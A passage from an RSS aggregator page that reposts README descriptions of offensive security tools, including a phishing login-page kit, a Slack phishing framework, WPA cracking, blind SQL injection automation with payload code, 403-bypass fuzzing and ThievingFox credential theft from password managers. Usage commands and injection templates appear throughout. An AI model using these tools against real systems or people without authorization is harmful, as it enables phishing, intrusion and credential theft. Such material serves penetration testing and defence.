FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

Mass-Assigner - Simple Tool Made To Probe For Mass Assignment Vulnerability Through JSON Field Modification In HTTP Requests

By: Zion3R


Mass Assigner is a powerful tool designed to identify and exploit mass assignment vulnerabilities in web applications. It achieves this by first retrieving data from a specified request, such as fetching user profile data. Then, it systematically attempts to apply each parameter extracted from the response to a second request provided, one parameter at a time. This approach allows for the automated testing and exploitation of potential mass assignment vulnerabilities.


Disclaimer

This tool actively modifies server-side data. Please ensure you have proper authorization before use. Any unauthorized or illegal activity using this tool is entirely at your own risk.

Features

  • Enables the addition of custom headers within requests
  • Offers customization of various HTTP methods for both origin and target requests
  • Supports rate-limiting to manage request thresholds effectively
  • Provides the option to specify "ignored parameters" which the tool will ignore during execution
  • Improved the support in nested arrays/objects inside JSON data in responses

What's Next

  • Support additional content types, such as "application/x-www-form-urlencoded"

Installation & Usage

Install requirements

pip3 install -r requirements.txt

Run the script

python3 mass_assigner.py --fetch-from "http://example.com/path-to-fetch-data" --target-req "http://example.com/path-to-probe-the-data"

Arguments

Forbidden Buster accepts the following arguments:

  -h, --help            show this help message and exit
--fetch-from FETCH_FROM
URL to fetch data from
--target-req TARGET_REQ
URL to send modified data to
-H HEADER, --header HEADER
Add a custom header. Format: 'Key: Value'
-p PROXY, --proxy PROXY
Use Proxy, Usage i.e: http://127.0.0.1:8080.
-d DATA, --data DATA Add data to the request body. JSON is supported with escaping.
--rate-limit RATE_LIMIT
Number of requests per second
--source-method SOURCE_METHOD
HTTP method for the initial request. Default is GET.
--target-method TARGET_METHOD
HTTP method for the modified request. Default is PUT.
--ignore-params IGNORE_PARAMS
Parameters to ignore during modification, separated by comma.

Example Usage:

python3 mass_assigner.py --fetch-from "http://example.com/api/v1/me" --target-req "http://example.com/api/v1/me" --header "Authorization: Bearer XXX" --proxy "http://proxy.example.com" --data '{\"param1\": \"test\", \"param2\":true}'



Thief Raccoon - Login Phishing Tool

By: Zion3R


Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.


Features

  • Phishing simulation for Windows 10, Windows 11, Windows XP, Windows Server, Ubuntu, Ubuntu Server, and macOS.
  • Capture user credentials for educational demonstrations.
  • Customizable login screens that mimic real operating systems.
  • Full-screen mode to enhance the phishing simulation.

Installation

Prerequisites

  • Python 3.x
  • pip (Python package installer)
  • ngrok (for exposing the local server to the internet)

Download and Install

  1. Clone the repository:

```bash git clone https://github.com/davenisc/thief_raccoon.git cd thief_raccoon

  1. Install python venv

```bash apt install python3.11-venv

  1. Create venv:

```bash python -m venv raccoon_venv source raccoon_venv/bin/activate

  1. Install the required libraries:

```bash pip install -r requirements.txt

Usage

  1. Run the main script:

```bash python app.py

  1. Select the operating system for the phishing simulation:

After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.

  1. Access the phishing page:

If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.

If you want to make the phishing page accessible over the internet, use ngrok.

Using ngrok

  1. Download and install ngrok

Download ngrok from ngrok.com and follow the installation instructions for your operating system.

  1. Expose your local server to the internet:

  2. Get the public URL:

After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.

How to install Ngrok on Linux?

  1. Install ngrok via Apt with the following command:

```bash curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok

  1. Run the following command to add your authtoken to the default ngrok.yml

```bash ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx

Deploy your app online

  1. Put your app online at ephemeral domain Forwarding to your upstream service. For example, if it is listening on port http://localhost:8080, run:

    ```bash ngrok http http://localhost:5000

Example

  1. Run the main script:

```bash python app.py

  1. Select Windows 11 from the menu:

```bash Select the operating system for phishing: 1. Windows 10 2. Windows 11 3. Windows XP 4. Windows Server 5. Ubuntu 6. Ubuntu Server 7. macOS Enter the number of your choice: 2

  1. Access the phishing page:

Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.

Disclaimer

This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.

License

This project is licensed under the MIT License. See the LICENSE file for details.

ScreenShots

Credits

Developer: @davenisc Web: https://davenisc.com



ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

By: Zion3R


ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


Features

  • Identifies potential ROP gadgets in binary executables.
  • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
  • Generates exploit templates to make the exploit process faster
  • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
  • Can print function names and addresses for further analysis.
  • Supports searching for specific instruction patterns.

Usage

  • <binary>: Path to the binary file for analysis.
  • -s, --search SEARCH: Optional. Search for specific instruction patterns.
  • -f, --functions: Optional. Print function names and addresses.

Examples

  • Analyze a binary without searching for specific instructions:

python3 ropdump.py /path/to/binary

  • Analyze a binary and search for specific instructions:

python3 ropdump.py /path/to/binary -s "pop eax"

  • Analyze a binary and print function names and addresses:

python3 ropdump.py /path/to/binary -f



EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

By: Zion3R

EvilSlackbot

A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

Disclaimer

This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.


Background

Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually provided permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an api token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, files, and search for secrets leaked in slack.

Phishing Simulations

In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)

Installation

EvilSlackbot requires python3 and Slackclient

pip3 install slackclient

Usage

usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
[-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]

options:
-h, --help show this help message and exit

Required:
-t TOKEN, --token TOKEN
Slack Oauth token

Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc
(Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token
(Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f
and -e,-eL, or -cH)

Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL
Email of target
-cH CHANNEL, --channel CHANNEL
Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST
Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks
associated with your provided token.
-o OUTFILE, --outfile OUTFILE
Outfile to store search results
-cL, --channel_list List all public Slack channels

Token

To use this tool, you must provide a xoxb or xoxp token.

Required:
-t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
python3 EvilSlackbot.py -t <token>

Attacks

Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.

Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)

-m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)

-s, --search Search slack for secrets with a keyword

-a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)

Spoofed messages (-sP)

With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>

Phishing Messages (-m)

With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>

Secret Search (-s)

With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.

python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>

Attachments (-a)

With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>

Arguments

Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL Email of target
-cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks associated with your provided token.
-o OUTFILE, --outfile OUTFILE Outfile to store search results
-cL, --channel_list List all public Slack channels

Channel Search

With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.

python3 EvilSlackbot.py -t <xoxb token> -cL


Pyrit - The Famous WPA Precomputed Cracker

By: Zion3R


Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.

WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.

These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

  • A single storage (e.g. a MySQL-server)
  • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
  • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computional nodes, two of which actually access the RPC-interface.

What's new

  • Fixed #479 and #481
  • Pyrit CUDA now compiles in OSX with Toolkit 7.5
  • Added use_CUDA and use_OpenCL in config file
  • Improved cores listing and managing
  • limit_ncpus now disables all CPUs when set to value <= 0
  • Improve CCMP packet identification, thanks to yannayl

See CHANGELOG file for a better description.

How to use

Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

How to participate

You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).



Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

By: Zion3R


Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023

More information can be found in our paper and slides.


Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester):
async def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()

To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
...

async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...

if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())

Now that eveything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables
tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns
columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together
metadata = await ext.extract_meta(strategy='model')

Once you know the structure, you can extract the actual content.

Example 1 - Extracting Generic Columns
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}


BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses

By: Zion3R


The original 403fuzzer.py :)

Fuzz 401/403ing endpoints for bypasses

This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.

It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.

I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.

You can now feed it raw HTTP requests that you save to a file from Burp.

Follow me on twitter! @intrudir


Usage

usage: bypassfuzzer.py -h

Specifying a request to test

Best method: Feed it a raw HTTP request from Burp!

Simply paste the request into a file and run the script!
- It will parse and use cookies & headers from the request. - Easiest way to authenticate for your requests

python3 bypassfuzzer.py -r request.txt

Using other flags

Specify a URL

python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

Specify cookies to use in requests:
some examples:

--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"

Specify a method/verb and body data to send

bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>

Specify -H "header: value" for each additional header you'd like to add:

bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

Smart filter feature!

Based on response code and length. If it sees a response 8 times or more it will automatically mute it.

Repeats are changeable in the code until I add an option to specify it in flag

NOTE: Can't be used simultaneously with -hc or -hl (yet)

# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart

Specify a proxy to use

Useful if you wanna proxy through Burp

bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

Skip sending header payloads or url payloads

# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers

# Skip sending path normailization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls

Hide response code/length

Provide comma delimited lists without spaces. Examples:

# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638

TODO

  • [x] Automatically check other methods/verbs for bypass
  • [x] absolute domain attack
  • [ ] Add HTTP/2 support
  • [ ] Looking for ideas. Ping me on twitter! @intrudir


SQLMC - Check All Urls Of A Domain For SQL Injections

By: Zion3R


SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

Features

  • Scans a domain for SQL injection vulnerabilities
  • Crawls the given URL up to a specified depth
  • Checks each link for SQL injection vulnerabilities
  • Reports vulnerabilities along with server information and depth

Installation

  1. Install the required dependencies: bash pip3 install sqlmc

Usage

Run sqlmc with the following command-line arguments:

  • -u, --url: The URL to scan (required)
  • -d, --depth: The depth to scan (required)
  • -o, --output: The output file to save the results

Example usage:

sqlmc -u http://example.com -d 2

Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

The tool will then perform the scan and display the results.

ToDo

  • Check for multiple GET params
  • Better injection checker trigger methods

Credits

License

This project is licensed under the GNU Affero General Public License v3.0.



HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems

By: Zion3R


HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. Hardening Meter supports all Linux distributions and machine-readable output, the results can be printed to the screen a table format or be exported to a csv. (For more information see Documentation.md file)


Execute Scanning Example

Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.

python3 HardeningMeter.py -f /bin/cp -s

Installation Requirements

Before installing HardeningMeter, make sure your machine has the following: 1. readelf and file commands 2. python version 3 3. pip 4. tabulate

pip install tabulate

Install HardeningMeter

The very latest developments can be obtained via git.

Clone or download the project files (no compilation nor installation is required)

git clone https://github.com/OfriOuzan/HardeningMeter

Arguments

-f --file

Specify the files you want to scan, the argument can get more than one file seperated by spaces.

-d --directory

Specify the directory you want to scan, the argument retrieves one directory and scan all ELF files recursively.

-e --external

Specify whether you want to add external checks (False by default).

-m --show_missing

Prints according to the order, only those files that are missing security hardening mechanisms and need extra attention.

-s --system

Specify if you want to scan the system hardening methods.

-c --csv_format'

Specify if you want to save the results to csv file (results are printed as a table to stdout by default).

Results

HardeningMeter's results are printed as a table and consisted of 3 different states: - (X) - This state indicates that the binary hardening mechanism is disabled. - (V) - This state indicates that the binary hardening mechanism is enabled. - (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.

Notes

When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.



ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

By: Zion3R


ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.

The accompanying blog post can be found here


Installation

Linux

Rustup must be installed, follow the instructions available here : https://rustup.rs/

The mingw-w64 package must be installed. On Debian, this can be done using :

apt install mingw-w64

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu

Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin

After adding Mono repositories, Nuget can be installed using apt :

apt install nuget

Finally, python dependancies must be installed :

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11.

Windows

Rustup must be installed, follow the instructions available here : https://rustup.rs/

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc

.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

Finally, python dependancies must be installed :

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11

NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)

Targets

All modules have been tested on the following Windows versions :

Windows Version
Windows Server 2022
Windows Server 2019
Windows Server 2016
Windows Server 2012R2
Windows 10
Windows 11

[!CAUTION] Modules have not been tested on other version, and are expected to not work.

Application Injection Method
KeePass.exe AppDomainManager Injection
KeePassXC.exe DLL Proxying
LogonUI.exe (Windows Login Screen) COM Hijacking
consent.exe (Windows UAC Popup) COM Hijacking
mstsc.exe (Windows default RDP client) COM Hijacking
RDCMan.exe (Sysinternals' RDP client) COM Hijacking
MobaXTerm.exe (3rd party RDP client) COM Hijacking

Usage

[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

ThievingFox contains 3 main modules : poison, cleanup and collect.

Poison

For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.

To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU hive).

--keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

The KeePass modules requires the Visual C++ Redistributable to be installed on the target.

Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

[!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--ke epassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications

Cleanup

For each application specified in the command line parameters, the cleanup first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.

For applications that support poisonning of both HKCU and HKCR hives, both are cleaned up regardless.

Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

It does not clean extracted credentials on the remote host.

[!IMPORTANT] If the targeted application is in use while the cleanup module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
